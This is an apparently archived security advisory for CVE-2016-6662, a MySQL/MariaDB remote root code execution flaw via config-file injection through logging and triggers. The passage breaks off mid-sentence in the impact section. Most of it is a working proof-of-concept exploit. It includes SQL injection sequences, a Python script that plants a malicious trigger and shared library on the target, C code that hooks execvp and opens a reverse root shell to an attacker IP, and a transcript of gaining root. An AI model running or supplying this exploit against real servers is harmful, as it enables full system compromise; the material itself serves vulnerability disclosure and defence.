MySQL 5.7.15 / 5.6.33 / 5.5.52 Remote Code Execution

`=============================================  
- Discovered by: Dawid Golunski  
- http://legalhackers.com  
- dawid (at) legalhackers.com  
  
- CVE-2016-6662  
- Release date: 12.09.2016  
- Severity: Critical  
=============================================  
  
  
I. VULNERABILITY  
-------------------------  
  
MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation (0day)  
5.6.33  
5.5.52  
  
MySQL clones are also affected, including:  
  
MariaDB  
PerconaDB   
  
  
II. BACKGROUND  
-------------------------  
  
"MySQL is the world's most popular open source database.   
Whether you are a fast growing web property, technology ISV or large   
enterprise, MySQL can cost-effectively help you deliver high performance,   
scalable database applications."  
  
"Many of the world's largest and fastest-growing organizations including   
Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time   
and money powering their high-volume Web sites, business-critical systems and   
packaged software."  
  
http://www.mysql.com/products/  
http://www.mysql.com/why-mysql/  
http://db-engines.com/en/system/MySQL  
  
  
III. INTRODUCTION  
-------------------------  
  
An independent research has revealed multiple severe MySQL vulnerabilities.  
This advisory focuses on a critical vulnerability with a CVEID of CVE-2016-6662  
which can allow attackers to (remotely) inject malicious settings into MySQL   
configuration files (my.cnf) leading to critical consequences.  
  
The vulnerability affects all MySQL servers in default configuration in all   
version branches (5.7, 5.6, and 5.5) including the latest versions, and could   
be exploited by both local and remote attackers.   
Both the authenticated access to MySQL database (via network connection or web   
interfaces such as phpMyAdmin) and SQL Injection could be used as exploitation   
vectors.  
  
As SQL Injection attacks are one of the most common issues in web applications,  
the CVE-2016-6662 vulnerabilty could put web applications at a critical risk in  
case of a successful SQL Injection attack.  
  
A successful exploitation could allow attackers to execute arbitrary code with   
root privileges which would then allow them to fully compromise the server on   
which an affected version of MySQL is running.   
  
Official patches for the vulnerability are not available at this time for Oracle  
MySQL server.   
The vulnerability can be exploited even if security modules SELinux and AppArmor  
are installed with default active policies for MySQL service on major Linux   
distributions.  
  
This advisory provides a Proof-Of-Concept MySQL exploit which demonstrates how   
Remote Root Code Execution could be achieved by attackers.   
  
  
IV. DESCRIPTION  
-------------------------  
  
The default MySQL package comes with a mysqld_safe script which is used by many  
default installations/packages of MySQL as a wrapper to start the MySQL service   
process which can observed, for example, in case of the following fully-updated  
Debian system:  
  
root@debian:~# lsb_release -a  
No LSB modules are available.  
Distributor ID: Debian  
Description: Debian GNU/Linux 8.5 (jessie)  
Release: 8.5  
Codename: jessie  
  
root@debian:~# dpkg -l | grep -i mysql-server  
ii mysql-server 5.5.50-0+deb8u1  
ii mysql-server-5.5 5.5.50-0+deb8u1  
ii mysql-server-core-5.5 5.5.50-0+deb8u1  
  
After starting MySQL (installed from packages provided in the default Debian repositories) by running  
  
root@debian:~# service mysql start  
  
or, alternatively:  
  
root@debian:~# /etc/init.d/mysql start  
  
The MySQL server process tree looks as follows:  
  
root 14967 0.0 0.1 4340 1588 ? S 06:41 0:00 /bin/sh /usr/bin/mysqld_safe  
  
mysql 15314 1.2 4.7 558160 47736 ? Sl 06:41 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306  
  
  
As can be seen, the mysqld_safe wrapper script is executed as root, whereas the  
main mysqld process drops its privileges to mysql user.  
  
  
The wrapper script has the following function :  
  
----[ /usr/bin/mysqld_safe ]----  
  
[...]  
  
# set_malloc_lib LIB  
# - If LIB is empty, do nothing and return  
# - If LIB is 'tcmalloc', look for tcmalloc shared library in /usr/lib  
# then pkglibdir. tcmalloc is part of the Google perftools project.  
# - If LIB is an absolute path, assume it is a malloc shared library  
#  
# Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when  
# running mysqld. See ld.so for details.  
set_malloc_lib() {  
malloc_lib="$1"  
  
if [ "$malloc_lib" = tcmalloc ]; then  
pkglibdir=`get_mysql_config --variable=pkglibdir`  
malloc_lib=  
# This list is kept intentionally simple. Simply set --malloc-lib  
# to a full path if another location is desired.  
for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do  
for flavor in _minimal '' _and_profiler _debug; do  
tmp="$libdir/libtcmalloc$flavor.so"  
#log_notice "DEBUG: Checking for malloc lib '$tmp'"  
[ -r "$tmp" ] || continue  
malloc_lib="$tmp"  
break 2  
done  
done  
  
[...]  
  
----------[ eof ]---------------  
  
  
which can be used to preload a shared library before starting the server.  
  
The library can be set with the following parameter:  
  
--malloc-lib=LIB   
  
This parameter can also be specified within a mysql config file (my.cnf)   
in a '[mysqld]' or '[mysqld_safe]' section.  
  
If an attacker managed to inject a path to their malicious library within the   
config, they would be able to preload an arbitrary library and thus execute   
arbitrary code with root privileges when MySQL service is restarted (manually,  
via a system update, package update, system reboot etc.)  
  
In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that   
allowed users to create mysql config files with a simple statement:  
  
SELECT * INFO OUTFILE '/var/lib/mysql/my.cnf'  
  
The issue was fixed by refusing to load config files with world-writable  
permissions as these are the default permissions applied to files created  
by OUTFILE query.  
As an additional protection, OUTFILE/DUMPFILE statements are prohibited from  
overwrite existing files.   
This protects existing configuration files.   
The old vulnerability has been considered fixed ever since the MySQL 3.23.55   
was released in 2003, and writing to configuration files has been considered   
impossible.  
  
However, the V. PROOF OF CONCEPT section below will show that it is possible to  
successfully bypass current restrictions by abusing MySQL logging functions   
(available in every MySQL install by default) to achieve the following:  
  
1) Inject malicious configuration into existing MySQL configuration files on  
systems with weak/improper permissions (configs owned by/writable by mysql user).  
  
2) Create new configuration files within a MySQL data directory (writable  
by MySQL by default) on _default_ MySQL installs without the need to rely on  
improper config permisions.  
  
3) Attackers with only SELECT/FILE permissions can gain access to logging   
functions (normally only available to MySQL admin users) on all of the   
_default_ MySQL installations and thus be in position to add/modify MySQL   
config files.  
  
  
V. PROOF OF CONCEPT  
-------------------------  
  
  
1) Inject malicious configuration into existing MySQL configuration files on  
systems with weak/improper permissions (configs owned by/writable by mysql user).  
~~~~~~~~~~~~~~~~~~~~~~~~  
  
MySQL configuration files are loaded from all supported locations and processed  
one by one when mysqld_safe script is executed.   
  
Exact config locations depend on MySQL version.   
For example, as described on:  
http://dev.mysql.com/doc/refman/5.5/en/option-files.html  
for MySQL 5.5 the config locations include:  
  
/etc/my.cnf Global options  
/etc/mysql/my.cnf Global options  
SYSCONFDIR/my.cnf Global options  
$MYSQL_HOME/my.cnf Server-specific options  
defaults-extra-file The file specified with --defaults-extra-file=file_name, if any  
~/.my.cnf User-specific options  
  
There is a common misconception that mysql config files should be owned by mysql  
user for the server to work properly.  
Many installation guides, or even security guides often wrongly advise users   
to set the ownership of mysql config files/directories such as /etc/mysql   
or /etc/my.cnf to mysql user.  
  
For example:  
https://github.com/willfong/mariadb-backup/blob/master/README.md  
says:  
  
"Lock down permissions on config file(s)   
  
chown mysql /etc/my.cnf  
chmod 600 /etc/my.cnf"  
  
Whereas the article at:  
http://www.devshed.com/c/a/mysql/security-issues-with-mysql/  
mentions:  
  
"You should also protect the global option file, /etc/my.cnf, if it exists.   
The mysql user should own it and have read/write access to it, but other users   
need only read access:  
  
shell> chown mysql /etc/my.cnf"  
  
Moreover, there are also MySQL recipes for installation automatation software   
such as Chef that also provide users with vulnerable permissions on my.cnf   
config files.  
  
If any of the MySQL config files is owned by mysql user, an attacker could  
append malicious config entries to it as follows:  
  
root@debian:~/# ls -l /etc/my.cnf   
-rw-r--r-- 1 mysql mysql 72 Jul 28 17:20 /etc/my.cnf  
  
root@debian:~/# cat /etc/my.cnf   
  
[mysqld]  
  
key_buffer = 16M  
max_allowed_packet = 16M  
  
  
Attacker could run the following SQL queries:  
  
mysql> set global general_log_file = '/etc/my.cnf';  
mysql> set global general_log = on;  
mysql> select '  
'>   
'> ; injected config entry  
'>   
'> [mysqld]  
'> malloc_lib=/tmp/mysql_exploit_lib.so  
'>   
'> [separator]  
'>   
'> ';  
1 row in set (0.00 sec)  
mysql> set global general_log = off;  
  
The resulting config would then have the following part appended:  
  
root@debian:~/# cat /etc/my.cnf   
  
[mysqld]  
  
key_buffer = 16M  
max_allowed_packet = 16M  
  
/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:  
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock  
Time Id Command Argument  
160728 17:25:14 40 Query select '  
  
; injected config entry  
  
[mysqld]  
malloc_lib=/tmp/mysql_exploit_lib.so  
  
[separator]  
  
'  
160728 17:25:15 40 Query set global general_log = off  
  
  
This config contains some redundant information that would normally cause MySQL  
to fail to startup during a restart due to parsing issues.   
  
However, the important part is that the config now contains the section:  
  
[mysqld]  
malloc_lib=/tmp/mysql_exploit_lib.so  
  
mysqld_safe will read the shared library path correctly and add it to   
the LD_PRELOAD environment variable before the startup of mysqld daemon.   
The preloaded library can then hook the libc fopen() calls and clean up   
the config before it is ever processed by mysqld daemon in order for it   
to start up successfully.   
  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~  
2) Create new configuration files within a MySQL data directory (writable  
by MySQL by default) on _default_ MySQL installs without the need to rely on  
improper config permisions.  
  
  
Analysis of the mysqld_safe script has shown that in addition to the   
config locations provided above, mysqld_safe also loads the configuration file   
from the mysql data directory (/var/lib/mysql/my.cnf) by default as can be   
seen below:  
  
----[ /usr/bin/mysqld_safe ]----  
  
[...]  
# Try where the binary installs put it  
if test -d $MY_BASEDIR_VERSION/data/mysql  
then  
DATADIR=$MY_BASEDIR_VERSION/data  
if test -z "$defaults" -a -r "$DATADIR/my.cnf"  
then  
defaults="--defaults-extra-file=$DATADIR/my.cnf"  
fi  
[...]  
  
----------[ eof ]---------------  
  
on MySQL versions in branches 5.5 and 5.6.  
The datadir location for my.cnf has only been removed from MySQL starting  
from 5.7 branch however in many configurations it will still load config  
from:  
  
/var/lib/mysql/.my.cnf  
  
The data directory /var/lib/mysql is (obviously) writable by mysql user on  
every install:  
  
root@debian:~# ls -ld /var/lib/mysql/  
drwx------ 4 mysql mysql 4096 Jul 28 06:41 /var/lib/mysql/  
  
Therefore, if no mysql-owned configs are available on the system, an attacker   
could still be able to exploit the vulnerability by creating a config at the  
following locations:  
  
/var/lib/mysql/my.cnf   
/var/lib/mysql/.my.cnf   
  
As mentioned, using FILE permission to create such a file with the SQL statement:  
  
SELECT 'malicious config entry' INTO OUTFILE '/var/lib/mysql/my.cnf'  
  
would not work, as MySQL creates files with rw permissions for the world:  
  
-rw-rw-rw- 1 mysql mysql 4 Jul 28 07:46 /var/lib/mysql/my.cnf  
  
and MySQL would prevent such world-writable config from being loaded at startup.  
  
Attackers could bypass this however by using these logging SQL statements:  
  
mysql> set global general_log_file = '/var/lib/mysql/my.cnf';  
mysql> set global general_log = on;  
mysql> select '  
'>   
'> ; injected config entry  
'>   
'> [mysqld]  
'> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so  
'>   
'> [separator]  
'>   
'> ';  
1 row in set (0.00 sec)  
mysql> set global general_log = off;  
  
The queries will create the my.cnf file with the necessary permissions   
(without o-w bit) for it to be parsed by the MySQL daemon:  
  
# ls -l /var/lib/mysql/my.cnf   
-rw-rw---- 1 mysql mysql 352 Jul 28 17:48 /var/lib/mysql/my.cnf  
  
The file will have the following contents:  
  
# cat /var/lib/mysql/my.cnf   
/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:  
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock  
Time Id Command Argument  
160728 17:48:22 43 Query select '  
  
; injected config entry  
  
[mysqld]  
malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so  
  
[separator]  
  
'  
160728 17:48:23 43 Query set global general_log = off  
  
  
One problem will remain however. MySQL will refuse files that do not start with  
a valid [section] header with the message:  
  
error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1  
Fatal error in defaults handling. Program aborted  
  
Further testing has however proved that it is possible to bypass this security  
restriction as well but these will not be included in this advisory for the   
time being.   
  
It is worth to note that attackers could use one of the other vulnerabilities discovered   
by the author of this advisory which has been assigned a CVEID of CVE-2016-6663 and is  
pending disclosure. The undisclosed vulnerability makes it easy for certain attackers to   
create /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege  
requirement.  
  
  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~  
3) Attackers with only SELECT/FILE permissions can gain access to logging functions   
(normally only available to MySQL admin users) on all of the _default_ MySQL   
installations and thus be in position to add/modify MySQL config files.  
  
  
If attackers do not have administrative rights required to access logging settings   
and only have standard user privileges with the addition of FILE privilege then   
they could still gain the ability to write to / modify configuration files.  
  
This could be achieved by writing a malicious trigger payload:  
  
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf  
AFTER INSERT  
ON `active_table` FOR EACH ROW  
BEGIN  
DECLARE void varchar(550);  
set global general_log_file='/var/lib/mysql/my.cnf';  
set global general_log = on;  
select "  
[mysqld]  
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'  
  
" INTO void;   
set global general_log = off;  
END;  
  
  
into a trigger file of an actively used table ('active_table') with the  
use of a statement similar to:  
  
SELECT '....trigger_code...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG'   
  
Such trigger will be loaded when tables get flushed. From this point on  
whenever an INSERT statement is invoked on the table, e.g:  
  
INSERT INTO `active_table` VALUES('xyz');  
  
The trigger's code will be executed with mysql root user privileges (see   
'definer' above) and will thus let attacker to modify the general_log settings   
despite the lack of administrative privileges on their standard account.  
  
  
------------------  
VI. PROOF OF CONCEPT - 0day 0ldSQL_MySQL_RCE_exploit.py exploit  
  
  
----------[ 0ldSQL_MySQL_RCE_exploit.py ]--------------  
  
#!/usr/bin/python  
  
# This is a limited version of the PoC exploit. It only allows appending to  
# existing mysql config files with weak permissions. See V) 1) section of   
# the advisory for details on this vector.   
#  
# Full PoC will be released at a later date, and will show how attackers could  
# exploit the vulnerability on default installations of MySQL on systems with no  
# writable my.cnf config files available.  
#  
# The upcoming advisory CVE-2016-6663 will also make the exploitation trivial  
# for certain low-privileged attackers that do not have FILE privilege.  
#   
# See full advisory for details:  
# http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt  
#  
# Stay tuned ;)  
  
intro = """  
0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)  
(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit  
  
For testing purposes only. Do no harm.  
  
Discovered/Coded by:  
  
Dawid Golunski  
http://legalhackers.com  
  
"""  
  
import argparse  
import mysql.connector   
import binascii  
import subprocess  
  
  
def info(str):  
print "[+] " + str + "\n"  
  
def errmsg(str):  
print "[!] " + str + "\n"  
  
def shutdown(code):  
if (code==0):  
info("Exiting (code: %d)\n" % code)  
else:  
errmsg("Exiting (code: %d)\n" % code)  
exit(code)  
  
  
cmd = "rm -f /var/lib/mysql/pocdb/poctable.TRG ; rm -f /var/lib/mysql/mysql_hookandroot_lib.so"  
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)  
(result, error) = process.communicate()  
rc = process.wait()   
  
  
# where will the library to be preloaded reside? /tmp might get emptied on reboot  
# /var/lib/mysql is safer option (and mysql can definitely write in there ;)  
malloc_lib_path='/var/lib/mysql/mysql_hookandroot_lib.so'  
  
  
# Main Meat  
  
print intro  
  
# Parse input args  
parser = argparse.ArgumentParser(prog='0ldSQL_MySQL_RCE_exploit.py', description='PoC for MySQL Remote Root Code Execution / Privesc CVE-2016-6662')  
parser.add_argument('-dbuser', dest='TARGET_USER', required=True, help='MySQL username')   
parser.add_argument('-dbpass', dest='TARGET_PASS', required=True, help='MySQL password')  
parser.add_argument('-dbname', dest='TARGET_DB', required=True, help='Remote MySQL database name')  
parser.add_argument('-dbhost', dest='TARGET_HOST', required=True, help='Remote MySQL host')  
parser.add_argument('-mycnf', dest='TARGET_MYCNF', required=True, help='Remote my.cnf owned by mysql user')  
  
args = parser.parse_args()  
  
  
# Connect to database. Provide a user with CREATE TABLE, SELECT and FILE permissions  
# CREATE requirement could be bypassed (malicious trigger could be attached to existing tables)  
info("Connecting to target server %s and target mysql account '%s@%s' using DB '%s'" % (args.TARGET_HOST, args.TARGET_USER, args.TARGET_HOST, args.TARGET_DB))  
try:  
dbconn = mysql.connector.connect(user=args.TARGET_USER, password=args.TARGET_PASS, database=args.TARGET_DB, host=args.TARGET_HOST)  
except mysql.connector.Error as err:  
errmsg("Failed to connect to the target: {}".format(err))  
shutdown(1)  
  
try:  
cursor = dbconn.cursor()  
cursor.execute("SHOW GRANTS")  
except mysql.connector.Error as err:  
errmsg("Something went wrong: {}".format(err))  
shutdown(2)  
  
privs = cursor.fetchall()  
info("The account in use has the following grants/perms: " )  
for priv in privs:  
print priv[0]  
print ""  
  
  
# Compile mysql_hookandroot_lib.so shared library that will eventually hook to the mysqld   
# process execution and run our code (Remote Root Shell)  
# Remember to match the architecture of the target (not your machine!) otherwise the library  
# will not load properly on the target.  
info("Compiling mysql_hookandroot_lib.so")  
cmd = "gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl"  
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)  
(result, error) = process.communicate()  
rc = process.wait()   
if rc != 0:  
errmsg("Failed to compile mysql_hookandroot_lib.so: %s" % cmd)  
print error   
shutdown(2)  
  
# Load mysql_hookandroot_lib.so library and encode it into HEX  
info("Converting mysql_hookandroot_lib.so into HEX")  
hookandrootlib_path = './mysql_hookandroot_lib.so'  
with open(hookandrootlib_path, 'rb') as f:  
content = f.read()  
hookandrootlib_hex = binascii.hexlify(content)  
  
# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG   
# Decoded payload (paths may differ):  
"""  
DELIMITER //  
CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf  
AFTER INSERT  
ON `poctable` FOR EACH ROW  
BEGIN  
  
DECLARE void varchar(550);  
set global general_log_file='/var/lib/mysql/my.cnf';  
set global general_log = on;  
select "  
  
# 0ldSQL_MySQL_RCE_exploit got here :)  
  
[mysqld]  
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'  
  
[abyss]  
" INTO void;   
set global general_log = off;  
  
END; //  
DELIMITER ;  
"""  
trigger_payload="""TYPE=TRIGGERS  
triggers='CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf\\nAFTER INSERT\\n ON `poctable` FOR EACH ROW\\nBEGIN\\n\\n DECLARE void varchar(550);\\n set global general_log_file=\\'%s\\';\\n set global general_log = on;\\n select "\\n\\n# 0ldSQL_MySQL_RCE_exploit got here :)\\n\\n[mysqld]\\nmalloc_lib=\\'%s\\'\\n\\n[abyss]\\n" INTO void; \\n set global general_log = off;\\n\\nEND'  
sql_modes=0  
definers='root@localhost'  
client_cs_names='utf8'  
connection_cl_names='utf8_general_ci'  
db_cl_names='latin1_swedish_ci'  
""" % (args.TARGET_MYCNF, malloc_lib_path)  
  
# Convert trigger into HEX to pass it to unhex() SQL function  
trigger_payload_hex = "".join("{:02x}".format(ord(c)) for c in trigger_payload)  
  
# Save trigger into a trigger file  
TRG_path="/var/lib/mysql/%s/poctable.TRG" % args.TARGET_DB  
info("Saving trigger payload into %s" % (TRG_path))  
try:  
cursor = dbconn.cursor()  
cursor.execute("""SELECT unhex("%s") INTO DUMPFILE '%s' """ % (trigger_payload_hex, TRG_path) )  
except mysql.connector.Error as err:  
errmsg("Something went wrong: {}".format(err))  
shutdown(4)  
  
# Save library into a trigger file  
info("Dumping shared library into %s file on the target" % malloc_lib_path)  
try:  
cursor = dbconn.cursor()  
cursor.execute("""SELECT unhex("%s") INTO DUMPFILE '%s' """ % (hookandrootlib_hex, malloc_lib_path) )  
except mysql.connector.Error as err:  
errmsg("Something went wrong: {}".format(err))  
shutdown(5)  
  
# Creating table poctable so that /var/lib/mysql/pocdb/poctable.TRG trigger gets loaded by the server  
info("Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded")  
try:  
cursor = dbconn.cursor()  
cursor.execute("CREATE TABLE `poctable` (line varchar(600)) ENGINE='MyISAM'" )  
except mysql.connector.Error as err:  
errmsg("Something went wrong: {}".format(err))  
shutdown(6)  
  
# Finally, execute the trigger's payload by inserting anything into `poctable`.   
# The payload will write to the mysql config file at this point.  
info("Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config %s" % args.TARGET_MYCNF )  
try:  
cursor = dbconn.cursor()  
cursor.execute("INSERT INTO `poctable` VALUES('execute the trigger!');" )  
except mysql.connector.Error as err:  
errmsg("Something went wrong: {}".format(err))  
shutdown(6)  
  
# Check on the config that was just created  
info("Showing the contents of %s config to verify that our setting (malloc_lib) got injected" % args.TARGET_MYCNF )  
try:  
cursor = dbconn.cursor()  
cursor.execute("SELECT load_file('%s')" % args.TARGET_MYCNF)  
except mysql.connector.Error as err:  
errmsg("Something went wrong: {}".format(err))  
shutdown(2)  
finally:  
dbconn.close() # Close DB connection  
print ""  
myconfig = cursor.fetchall()  
print myconfig[0][0]  
info("Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)")  
  
# Spawn a Shell listener using netcat on 6033 (inverted 3306 mysql port so easy to remember ;)  
info("Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :)" )  
listener = subprocess.Popen(args=["/bin/nc", "-lvp","6033"])  
listener.communicate()  
print ""  
  
# Show config again after all the action is done  
info("Shell closed. Hope you had fun. ")  
  
# Mission complete, but just for now... Stay tuned :)  
info("""Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;)""")  
  
  
# Shutdown  
shutdown(0)  
  
  
---------------------------------------------------  
  
  
  
  
  
----------[ mysql_hookandroot_lib.c ]--------------  
  
/*  
  
(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit  
mysql_hookandroot_lib.c  
  
This is the shared library injected by 0ldSQL_MySQL_RCE_exploit.py exploit.  
The library is meant to be loaded by mysqld_safe on mysqld daemon startup  
to create a reverse shell that connects back to the attacker's host on  
6603 port (mysql port in reverse ;) and provides a root shell on the  
target.   
  
mysqld_safe will load this library through the following setting:  
  
[mysqld]  
malloc_lib=mysql_hookandroot_lib.so  
  
in one of the my.cnf config files (e.g. /etc/my.cnf).  
  
This shared library will hook the execvp() function which is called  
during the startup of mysqld process.   
It will then fork a reverse shell and clean up the poisoned my.cnf  
file in order to let mysqld run as normal so that:  
'service mysql restart' will work without a problem.  
  
Before compiling adjust IP / PORT and config path.  
  
  
~  
Discovered/Coded by:  
  
Dawid Golunski  
http://legalhackers.com  
  
  
~  
Compilation (remember to choose settings compatible with the remote OS/arch):  
  
gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl  
  
Disclaimer:  
  
For testing purposes only. Do no harm.  
  
Full advisory URL:  
http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt  
  
*/  
  
#define _GNU_SOURCE  
#include <stdio.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <unistd.h>  
#include <string.h>  
#include <dlfcn.h>  
#include <stdlib.h>  
#include <stdarg.h>  
#include <fcntl.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
#include <arpa/inet.h>  
  
#define ATTACKERS_IP "127.0.0.1"  
#define SHELL_PORT 6033  
#define INJECTED_CONF "/var/lib/mysql/my.cnf"  
  
char* env_list[] = { "HOME=/root", NULL };  
typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]);  
static execvp_func_t old_execvp = NULL;  
  
  
// fork & send a bash shell to the attacker before starting mysqld  
void reverse_shell(void) {  
  
int i; int sockfd;  
//socklen_t socklen;  
struct sockaddr_in srv_addr;  
srv_addr.sin_family = AF_INET;   
srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port  
srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip   
  
// create new TCP socket && connect  
sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );  
connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));  
  
for(i = 0; i <= 2; i++) dup2(sockfd, i);  
execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list );  
  
exit(0);  
}  
  
  
/*  
cleanup injected data from the target config before it is read by mysqld  
in order to ensure clean startup of the service  
  
The injection (if done via logging) will start with a line like this:  
  
/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:  
  
*/  
  
int config_cleanup() {  
  
FILE *conf;  
char buffer[2000];  
long cut_offset=0;  
  
conf = fopen(INJECTED_CONF, "r+");  
if (!conf) return 1;  
  
while (!feof(conf)) {  
fgets(buffer, sizeof(buffer), conf);  
if (strstr(buffer,"/usr/sbin/mysqld, Version")) {  
cut_offset = (ftell(conf) - strlen(buffer));  
}  
  
}  
if (cut_offset>0) ftruncate(fileno(conf), cut_offset);  
fclose(conf);  
return 0;  
  
}  
  
  
// execvp() hook  
int execvp(const char* filename, char* const argv[]) {  
  
pid_t pid;  
int fd;  
  
// Simple root PoC (touch /root/root_via_mysql)  
fd = open("/root/root_via_mysql", O_CREAT);  
close(fd);  
  
old_execvp = dlsym(RTLD_NEXT, "execvp");  
  
// Fork a reverse shell and execute the original execvp() function  
pid = fork();  
if (pid == 0)   
reverse_shell();  
  
// clean injected payload before mysqld is started  
config_cleanup();  
return old_execvp(filename, argv);  
}  
  
  
------------------------------------------------  
  
  
  
  
Replication / testing:  
~~~~~~~~~~~~~~~~~  
  
As admin on the target system:  
~~~~~~~  
  
1. Set up a test database account/permissions:  
  
CREATE DATABASE pocdb;  
GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY 'p0cpass!';  
GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%';   
  
  
2. Simulate write access on any of available mysql configs.  
It just needs to be a valid/parsable config with section e.g:  
  
[isamchk]  
key_buffer = 16M  
  
For example, /etc/mysql/my.cnf on Debian:  
  
# chown mysql:mysql /etc/mysql/my.cnf  
  
# ls -l /etc/mysql/my.cnf  
-rw-r--r-- 1 mysql mysql 3534 Sep 11 02:15 /etc/mysql/my.cnf  
  
3. Run the exploit as the attacker and restart mysql when exploit  
is done.  
  
  
As attacker:  
~~~~~~~  
  
1. Enter your library path in mysql_hookandroot_lib.c src.  
  
2. Run the 0ldSQL_MySQL_RCE_exploit.py script.  
  
  
Example run:  
~~~~~~~  
  
attacker$ ./0ldSQL_MySQL_RCE_exploit.py -dbuser attacker -dbpass 'p0cpass!' -dbhost 192.168.1.10 -dbname pocdb -mycnf /etc/mysql/my.cnf  
  
0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)  
(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit  
  
For testing purposes only. Do no harm.  
  
Discovered/Coded by:  
  
Dawid Golunski  
http://legalhackers.com  
  
  
[+] Connecting to target server 192.168.1.10 and target mysql account '[email protected]' using DB 'pocdb'  
  
[+] The account in use has the following grants/perms:   
  
GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY PASSWORD <secret>  
GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%'  
  
[+] Compiling mysql_hookandroot_lib.so  
  
[+] Converting mysql_hookandroot_lib.so into HEX  
  
[+] Saving trigger payload into /var/lib/mysql/pocdb/poctable.TRG  
  
[+] Dumping shared library into /var/lib/mysql/mysql_hookandroot_lib.so file on the target  
  
[+] Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded  
  
[+] Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config /etc/mysql/my.cnf  
  
[+] Showing the contents of /etc/mysql/my.cnf config to verify that our setting (malloc_lib) got injected  
  
[mysql]  
#no-auto-rehash # faster start of mysql but no tab completition  
  
[isamchk]  
key_buffer = 16M  
  
!includedir /etc/mysql/conf.d/  
/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:  
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock  
Time Id Command Argument  
160912 8:48:41 44 Query select "  
  
# 0ldSQL_MySQL_RCE_exploit got here :)  
  
[mysqld]  
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'  
  
[abyss]  
" INTO void  
44 Query SET global general_log = off  
  
[+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)  
  
[+] Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :)  
  
listening on [any] 6033 ...  
  
connect to [192.168.1.20] from dbserver [192.168.1.10] 36932  
bash: cannot set terminal process group (963): Inappropriate ioctl for device  
bash: no job control in this shell  
  
root@debian:/# id  
id  
uid=0(root) gid=0(root) groups=0(root)  
  
root@debian:/# ls -l /root/root_via_mysql  
---------- 1 root root 0 Sep 10 22:50 /root/root_via_mysql  
  
  
root@debian:/# exit   
exit  
exit  
  
[+] Shell closed. Hope you had fun.   
  
[+] Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;)  
  
[+] Exiting (code: 0)  
  
  
  
  
VII. BUSINESS IMPACT  
-------------------------  
  
As discussed above the vulnerability could be exploited by attackers with both   
privileged and unprivileged (with FILE privilege only) access to mysql accounts.   
It could also be combined with CVE-2016-6663 vulnerability which will be released  
shortly and could allow certain attackers to escalate their privileges to root   
even without FILE privilege.  
  
The vulnerability could also be exploited via an SQL injection vector, which   
